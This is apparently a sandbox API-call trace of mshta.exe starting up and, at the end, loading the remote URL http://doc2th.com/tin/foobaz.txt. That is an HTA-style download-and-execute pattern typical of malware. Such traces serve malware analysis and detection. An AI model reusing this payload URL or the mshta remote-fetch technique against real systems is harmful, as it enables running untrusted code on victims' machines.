[0026.588] GetSystemMetrics (nIndex=68) returned 4 [0026.588] GetSystemMetrics (nIndex=69) returned 4 [0026.588] GetSystemMetrics (nIndex=2) returned 17 [0026.588] GetSystemMetrics (nIndex=3) returned 17 [0026.588] GetStockObject (i=13) returned 0x18a002e [0026.588] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x18a002e [0026.588] GetTextMetricsW (in: hdc=0x210107a8, lptm=0x40eb04 | out: lptm=0x40eb04) returned 1 [0026.588] SelectObject (hdc=0x210107a8, h=0x18a002e) returned 0x18a002e [0026.588] DeleteObject (ho=0x18a002e) returned 1 [0026.588] GetSystemDefaultLCID () returned 0x409 [0026.588] GetUserDefaultLCID () returned 0x409 [0026.588] GetACP () returned 0x4e4 [0026.588] GetLocaleInfoW (in: Locale=0x400, LCType=0x1014, lpLCData=0x40ea78, cchData=41 | out: lpLCData="1") returned 2 [0026.588] _wtoi (_String="1") returned 1 [0026.588] RegCloseKey (hKey=0x0) returned 0x6 [0026.588] GetLocaleInfoW (in: Locale=0x400, LCType=0x13, lpLCData=0x40eacc, cchData=16 | out: lpLCData="0123456789") returned 11 [0026.588] SystemParametersInfoW (in: uiAction=0x46, uiParam=0x0, pvParam=0x6368b038, fWinIni=0x0 | out: pvParam=0x6368b038) returned 1 [0026.588] SystemParametersInfoW (in: uiAction=0x42, uiParam=0xc, pvParam=0x40eb40, fWinIni=0x0 | out: pvParam=0x40eb40) returned 1 [0026.589] GetSystemWindowsDirectoryW (in: lpBuffer=0x40e94c, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0026.589] lstrlenW (lpString="C:\\Windows") returned 10 [0026.589] lstrlenW (lpString="\\WindowsShell.manifest") returned 22 [0026.589] CreateActCtxW (pActCtx=0x40e928) returned 0x11fa2c [0026.590] ActivateActCtx (in: hActCtx=0x11fa2c, lpCookie=0x40e8f8 | out: hActCtx=0x11fa2c, lpCookie=0x40e8f8) returned 1 [0026.590] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74080000 [0026.592] DeactivateActCtx (dwFlags=0x0, ulCookie=0x17c00001) returned 1 [0026.592] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInset", nDefault=11) returned 0xb [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollDelay", nDefault=50) returned 0x32 [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=200) returned 0xc8 [0026.593] GetProfileIntA (lpAppName="windows", lpKeyName="DragScrollInterval", nDefault=50) returned 0x32 [0026.593] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x40e558, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.593] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40e760, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.593] GetCurrentProcess () returned 0xffffffff [0026.593] GetModuleBaseNameW (in: hProcess=0xffffffff, hModule=0x0, lpBaseName=0x40e968, nSize=0x104 | out: lpBaseName="mShta.exe") returned 0x9 [0026.594] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.594] FindAtomW (lpString="TridentEnableHiRes") returned 0x0 [0026.594] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", pszValue="NoFileMenu", pdwType=0x40e544, pvData=0x40e550, pcbData=0x40e54c*=0x4 | out: pdwType=0x40e544*=0x0, pvData=0x40e550, pcbData=0x40e54c*=0x4) returned 0x2 [0026.594] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40e4bc | out: phkResult=0x40e4bc*=0x168) returned 0x0 [0026.594] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40e4c0 | out: phkResult=0x40e4c0*=0x164) returned 0x0 [0026.594] RegOpenKeyExW (in: hKey=0x164, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x40e47c | out: phkResult=0x40e47c*=0x0) returned 0x2 [0026.594] RegOpenKeyExW (in: hKey=0x168, lpSubKey="FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS", ulOptions=0x0, samDesired=0x1, phkResult=0x40e47c | out: phkResult=0x40e47c*=0x0) returned 0x2 [0026.594] RegCloseKey (hKey=0x0) returned 0x6 [0026.594] RegCloseKey (hKey=0x0) returned 0x6 [0026.594] RegCloseKey (hKey=0x168) returned 0x0 [0026.594] RegCloseKey (hKey=0x164) returned 0x0 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] MulDiv (nNumber=1073741823, nNumerator=96, nDenominator=1440) returned 71582788 [0026.595] GetCurrentThreadId () returned 0xa1c [0026.595] RegisterClipboardFormatW (lpszFormat="WM_HTML_GETOBJECT") returned 0xc19c [0026.595] CoInternetIsFeatureEnabled (FeatureEntry=0xc, dwFlags=0x2) returned 0x1 [0026.596] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x63688cd4, dwReserved=0x0 | out: ppSM=0x63688cd4*=0x121f20) returned 0x0 [0026.605] GetCurrentThreadId () returned 0xa1c [0026.605] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40e86c | out: ppURI=0x40e86c*=0x11ab04) returned 0x0 [0026.605] IUri:GetPropertyDWORD (in: This=0x11ab04, uriProp=0x11, pdwProperty=0x40e854, dwFlags=0x0 | out: pdwProperty=0x40e854*=0x11) returned 0x0 [0026.605] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x121764, dwReserved=0x0 | out: ppSM=0x121764*=0x122f88) returned 0x0 [0026.605] IInternetSecurityManager:SetSecuritySite (This=0x122f88, pSite=0x12176c) returned 0x0 [0026.605] IUnknown:AddRef (This=0x12176c) returned 0x28 [0026.605] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40e824 | out: ppvObject=0x40e824*=0x121770) returned 0x0 [0026.605] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x122fb0 | out: ppvObject=0x122fb0*=0x0) returned 0x80004002 [0026.605] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x122fac | out: ppvObject=0x122fac*=0x0) returned 0x80004002 [0026.605] IServiceProvider:QueryService (in: This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x122fa8 | out: ppvObject=0x122fa8*=0x0) returned 0x80004002 [0026.606] IUnknown:Release (This=0x121770) returned 0x0 [0026.606] IInternetSecurityManager:GetSecurityId (in: This=0x122f88, pwszUrl="about:blank", pbSecurityId=0x40e8c0, pcbSecurityId=0x40e8b4*=0x200, dwReserved=0x0 | out: pbSecurityId=0x40e8c0*=0x61, pcbSecurityId=0x40e8b4*=0xf) returned 0x0 [0026.613] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x40de40*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40d4f8 | out: ppv=0x40d4f8*=0x63688c70) returned 0x0 [0026.613] IUnknown:AddRef (This=0x63688c70) returned 0x1 [0026.613] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x40e0bc | out: ppvObject=0x40e0bc*=0x63688c70) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e27c | out: ppvObject=0x40e27c*=0x63688c7c) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e2c4, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x40e2c4*=0xc) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.614] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e190 | out: ppv=0x40e190*=0x63688c70) returned 0x0 [0026.614] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e27c | out: ppvObject=0x40e27c*=0x63688c7c) returned 0x0 [0026.614] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.614] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e2d4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x40e2d4*=0x0) returned 0x800c0011 [0026.614] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.614] IUnknown:Release (This=0x11ab04) returned 0x2 [0026.614] CoInternetCreateSecurityManager (in: pSP=0x0, ppSM=0x40e894, dwReserved=0x0 | out: ppSM=0x40e894*=0x1234e8) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea44 | out: phkResult=0x40ea44*=0x1b0) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea48 | out: phkResult=0x40ea48*=0x1bc) returned 0x0 [0026.615] RegOpenKeyExW (in: hKey=0x1bc, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea04 | out: phkResult=0x40ea04*=0x0) returned 0x2 [0026.615] RegOpenKeyExW (in: hKey=0x1b0, lpSubKey="FEATURE_DOCUMENT_COMPATIBLE_MODE", ulOptions=0x0, samDesired=0x1, phkResult=0x40ea04 | out: phkResult=0x40ea04*=0x0) returned 0x2 [0026.615] RegCloseKey (hKey=0x0) returned 0x6 [0026.615] RegCloseKey (hKey=0x0) returned 0x6 [0026.615] RegCloseKey (hKey=0x1b0) returned 0x0 [0026.615] RegCloseKey (hKey=0x1bc) returned 0x0 [0026.615] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x40e888 | out: ppURI=0x40e888*=0x11ab04) returned 0x0 [0026.616] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e160 | out: ppv=0x40e160*=0x63688c70) returned 0x0 [0026.616] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e24c | out: ppvObject=0x40e24c*=0x63688c7c) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.616] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=3, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e294, dwReserved=0x0 | out: pwzResult="about:blank", pcchResult=0x40e294*=0xc) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.616] DllGetClassObject (in: rclsid=0x11e730*(Data1=0x3050f406, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76494430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x40e160 | out: ppv=0x40e160*=0x63688c70) returned 0x0 [0026.616] IUnknown:QueryInterface (in: This=0x63688c70, riid=0x764baadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x40e24c | out: ppvObject=0x40e24c*=0x63688c7c) returned 0x0 [0026.616] IUnknown:Release (This=0x63688c70) returned 0x1 [0026.616] IInternetProtocolInfo:ParseUrl (in: This=0x63688c7c, pwzUrl="about:blank", ParseAction=17, dwParseFlags=0x0, pwzResult=0x1129d0, cchResult=0xc, pcchResult=0x40e2a4, dwReserved=0x0 | out: pwzResult="", pcchResult=0x40e2a4*=0x0) returned 0x800c0011 [0026.616] IUnknown:Release (This=0x63688c7c) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0026.616] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0026.617] IUnknown:Release (This=0x11ab04) returned 0x2 [0026.617] GetDC (hWnd=0x0) returned 0xb0108b5 [0026.617] GetDeviceCaps (hdc=0xb0108b5, index=88) returned 96 [0026.617] ReleaseDC (hWnd=0x0, hDC=0xb0108b5) returned 1 [0026.617] MulDiv (nNumber=100000, nNumerator=96, nDenominator=96) returned 100000 [0026.617] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40eae0 | out: phkResult=0x40eae0*=0x128) returned 0x0 [0026.617] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40eae4 | out: phkResult=0x40eae4*=0x1b0) returned 0x0 [0026.617] RegOpenKeyExW (in: hKey=0x1b0, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x40eaa0 | out: phkResult=0x40eaa0*=0x0) returned 0x2 [0026.617] RegOpenKeyExW (in: hKey=0x128, lpSubKey="FEATURE_WEBOC_DOCUMENT_ZOOM", ulOptions=0x0, samDesired=0x1, phkResult=0x40eaa0 | out: phkResult=0x40eaa0*=0x0) returned 0x2 [0026.617] RegCloseKey (hKey=0x0) returned 0x6 [0026.617] RegCloseKey (hKey=0x0) returned 0x6 [0026.617] RegCloseKey (hKey=0x128) returned 0x0 [0026.617] RegCloseKey (hKey=0x1b0) returned 0x0 [0026.617] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c10000 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="InitializeSRWLock") returned 0x76fa9981 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="AcquireSRWLockExclusive") returned 0x76fa334e [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="AcquireSRWLockShared") returned 0x76fa338e [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="ReleaseSRWLockExclusive") returned 0x76fa3324 [0026.618] GetProcAddress (hModule=0x76c10000, lpProcName="ReleaseSRWLockShared") returned 0x76fa33d7 [0026.618] RtlInitializeConditionVariable () returned 0x12a53c [0026.618] IUnknown:Release (This=0x63688cb0) returned 0x1 [0026.633] IUnknown_QueryService (in: punk=0x636896a4, guidService=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvOut=0x121088 | out: ppvOut=0x121088*=0x0) returned 0x80004005 [0026.633] IUnknown:QueryInterface (in: This=0x636896a4, riid=0x771342d8*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f830 | out: ppvObject=0x40f830*=0x636896b8) returned 0x0 [0026.633] IServiceProvider:QueryService (in: This=0x636896b8, guidService=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), riid=0x6331880c*(Data1=0xd81f90a3, Data2=0x8156, Data3=0x44f7, Data4=([0]=0xad, [1]=0x28, [2]=0x5a, [3]=0xbb, [4]=0x87, [5]=0x0, [6]=0x32, [7]=0x74)), ppvObject=0x121088 | out: ppvObject=0x121088*=0x0) returned 0x80004005 [0026.633] IUnknown:Release (This=0x636896b8) returned 0x1 [0026.633] IInternetSecurityManager:SetSecuritySite (This=0x122f88, pSite=0x12176c) returned 0x0 [0026.633] IUnknown:Release (This=0x12176c) returned 0x0 [0026.633] IUnknown:AddRef (This=0x12176c) returned 0x28 [0026.633] IUnknown:QueryInterface (in: This=0x12176c, riid=0x764a61d0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x40f868 | out: ppvObject=0x40f868*=0x121770) returned 0x0 [0026.633] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), riid=0x764af13c*(Data1=0xf1e50292, Data2=0xa795, Data3=0x4117, Data4=([0]=0x8e, [1]=0x9, [2]=0x2b, [3]=0x56, [4]=0xa, [5]=0x72, [6]=0xac, [7]=0x60)), ppvObject=0x122fb0 | out: ppvObject=0x122fb0*=0x0) returned 0x80004002 [0026.633] IServiceProvider:QueryService (in: This=0x121770, guidService=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), riid=0x764af12c*(Data1=0xf164edf1, Data2=0xcc7c, Data3=0x4f0d, Data4=([0]=0x9a, [1]=0x94, [2]=0x34, [3]=0x22, [4]=0x26, [5]=0x25, [6]=0xc3, [7]=0x93)), ppvObject=0x122fac | out: ppvObject=0x122fac*=0x0) returned 0x80004002 [0026.634] IServiceProvider:QueryService (in: This=0x121770, guidService=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7649c484*(Data1=0x79eac9ee, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x122fa8 | out: ppvObject=0x122fa8*=0x636896bc) returned 0x0 [0026.634] IUnknown:Release (This=0x121770) returned 0x0 [0026.634] CoTaskMemAlloc (cb=0x6d) returned 0x12a5f0 [0026.634] CoTaskMemAlloc (cb=0x9) returned 0x11cfc8 [0026.648] StrChrW (lpStart="HTA", wMatch=0x3b) returned 0x0 [0026.653] IsCharSpaceW (wch=0x48) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x5c) returned 0 [0026.653] IsCharSpaceW (wch=0x5c) returned 0 [0026.653] IsCharSpaceW (wch=0x41) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x20) returned 0 [0026.653] IsCharSpaceW (wch=0x20) returned 1 [0026.653] IsCharSpaceW (wch=0x7b) returned 0 [0026.653] IsCharSpaceW (wch=0x20) returned 1 [0026.653] IsCharAlphaNumericW (ch=0x7b) returned 0 [0026.653] IsCharSpaceW (wch=0x62) returned 0 [0026.653] IsCharAlphaNumericW (ch=0x3a) returned 0 [0026.653] IsCharSpaceW (wch=0x3a) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x3a) returned 0 [0026.655] IsCharSpaceW (wch=0x75) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x28) returned 0 [0026.655] IsCharSpaceW (wch=0x28) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x28) returned 0 [0026.655] IsCharSpaceW (wch=0x23) returned 0 [0026.655] IsCharSpaceW (wch=0x23) returned 0 [0026.655] IsCharSpaceW (wch=0x7d) returned 0 [0026.655] IsCharAlphaNumericW (ch=0x7d) returned 0 [0026.655] IsCharSpaceW (wch=0x29) returned 0 [0026.655] IsCharSpaceW (wch=0x75) returned 0 [0026.656] IsCharSpaceW (wch=0x75) returned 0 [0026.656] IsCharSpaceW (wch=0x29) returned 0 [0026.656] CoTaskMemFree (pv=0x12a5f0) [0026.656] CoTaskMemFree (pv=0x11cfc8) [0026.656] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75580000 [0026.656] GetProcAddress (hModule=0x75580000, lpProcName=0x6) returned 0x75583e59 [0026.656] StrCmpCW (pszStr1="Software\\Microsoft\\Internet Explorer", pszStr2="Software\\Microsoft\\Windows Mail\\Trident") returned -14 [0026.656] IsOS (dwOS=0x25) returned 1 [0026.656] GetSysColor (nIndex=26) returned 0xcc6600 [0026.656] IsOS (dwOS=0x25) returned 1 [0026.656] GetSysColor (nIndex=5) returned 0xffffff [0026.656] GetSysColor (nIndex=8) returned 0x0 [0026.658] wcstol (in: _String="0,0,255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",0,255") returned 0 [0026.658] wcstol (in: _String="0,255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",255") returned 0 [0026.658] wcstol (in: _String="255", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*="") returned 255 [0026.658] wcstol (in: _String="128,0,128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",0,128") returned 128 [0026.658] wcstol (in: _String="0,128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*=",128") returned 0 [0026.658] wcstol (in: _String="128", _EndPtr=0x40e4c4, _Radix=10 | out: _EndPtr=0x40e4c4*="") returned 128 [0026.659] GetModuleHandleW (lpModuleName="EXPLORER.EXE") returned 0x0 [0026.659] GetModuleHandleW (lpModuleName="IEXPLORE.EXE") returned 0x0 [0026.659] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\PageSetup", ulOptions=0x0, samDesired=0x20019, phkResult=0x40f57c | out: phkResult=0x40f57c*=0x88) returned 0x0 [0026.659] SHGetValueW (in: hkey=0x88, pszSubKey=0x0, pszValue="Print_Background", pdwType=0x0, pvData=0x40f580, pcbData=0x40f578*=0xa | out: pdwType=0x0, pvData=0x40f580, pcbData=0x40f578*=0xa) returned 0x2 [0026.659] RegCloseKey (hKey=0x88) returned 0x0 [0026.670] GetAcceptLanguagesW () returned 0x0 [0026.670] GetClassNameW (in: hWnd=0x10200, lpClassName=0x40f84c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0026.670] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0026.670] GetParent (hWnd=0x10200) returned 0x101fc [0026.670] GetClassNameW (in: hWnd=0x101fc, lpClassName=0x40f84c, nMaxCount=10 | out: lpClassName="HTML Appl") returned 9 [0026.670] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="HTML Appl", cchCount1=9, lpString2="HH Parent", cchCount2=9) returned 3 [0026.670] GetParent (hWnd=0x101fc) returned 0x0 [0026.672] IMoniker:GetDisplayName (in: This=0xff600, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x40f810 | out: ppszDisplayName=0x40f810*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] IUnknown:QueryInterface (in: This=0xff600, riid=0x632872f4*(Data1=0xa158a630, Data2=0xed6f, Data3=0x45fb, Data4=([0]=0xb9, [1]=0x87, [2]=0xf6, [3]=0x86, [4]=0x76, [5]=0xf5, [6]=0x77, [7]=0x52)), ppvObject=0x40f7e8 | out: ppvObject=0x40f7e8*=0xff60c) returned 0x0 [0026.672] IUriContainer:GetIUri (in: This=0xff60c, ppIUri=0x40f818 | out: ppIUri=0x40f818*=0x11ae64) returned 0x0 [0026.672] IUnknown:Release (This=0xff60c) returned 0x1 [0026.672] IUnknown:AddRef (This=0xff600) returned 0x2 [0026.672] IUnknown:AddRef (This=0x11ae64) returned 0x5 [0026.672] IMoniker:GetDisplayName (in: This=0xff600, pbc=0x0, pmkToLeft=0x0, ppszDisplayName=0x40f6f0 | out: ppszDisplayName=0x40f6f0*="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] UrlGetLocationW (psz1="http://doc2th.com/tin/foobaz.txt") returned 0x0 [0026.672] CreateURLMonikerEx (in: pMkCtx=0x0, szURL="http://doc2th.com/tin/foobaz.txt", ppmk=0x40f6bc*=0x0, dwFlags=0x1 | out: ppmk=0x40f6bc*=0x12e480) returned 0x0 [0026.673] CreateUri (in: pwzURI="http://doc2th.com/tin/foobaz.txt", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x40f6b4 | out: ppURI=0x40f6b4*=0x11ae64) returned 0x0 [0026.673] IUri:GetScheme (in: This=0x11ae64, pdwScheme=0x40f64c | out: pdwScheme=0x40f64c*=0x2) returned 0x0 [0026.673] CoInternetIsFeatureEnabled (FeatureEntry=0x1, dwFlags=0x2) returned 0x1 